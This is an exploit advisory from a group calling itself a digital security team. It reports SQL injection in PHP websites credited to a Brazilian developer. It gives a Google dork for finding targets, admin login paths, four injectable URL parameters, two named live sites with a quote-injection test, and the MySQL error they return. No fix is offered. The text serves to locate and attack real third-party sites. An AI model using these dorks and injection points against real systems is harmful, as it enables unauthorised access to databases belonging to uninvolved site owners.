###################################################
# Exploit Title : Desenvolvido por Gilbert Sampaio SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/01/2019
# Vendor Homepage : pt-br.facebook.com/gilbert.sampaio.3
# Script Owner E-Mail : rec.batista@hotmail.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Gilbert Sampaio."
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
###################################################
# Admin Panel Login Path :
*************************
/login.php
/amauto/login.php
# SQL Injection Exploit :
***********************
/ver_news.php?ID=[SQL Injection]
/ver_info.php?ID=[SQL Injection]
/fotos.php?cod=[SQL Injection]
/ocartorio.php?ID=[SQL Injection]
###################################################
# Example Vulnerable Site :
*************************
Note : (201.87.225.16) => There are 291 domains hosted on this server.
[+] cartoriovales.com.br/ver_info.php?ID=2%27 =>
[ Proof of Concept ] => archive.fo/IXb5x
[+] solucioncorrespondente.com.br/ver_info.php?ID=3%27
###################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version
for the right syntax to use near 'Ativo'' at line 1
?Erro 2: SELECT * FROM imagem WHERE album_id_Album = 1'
###################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################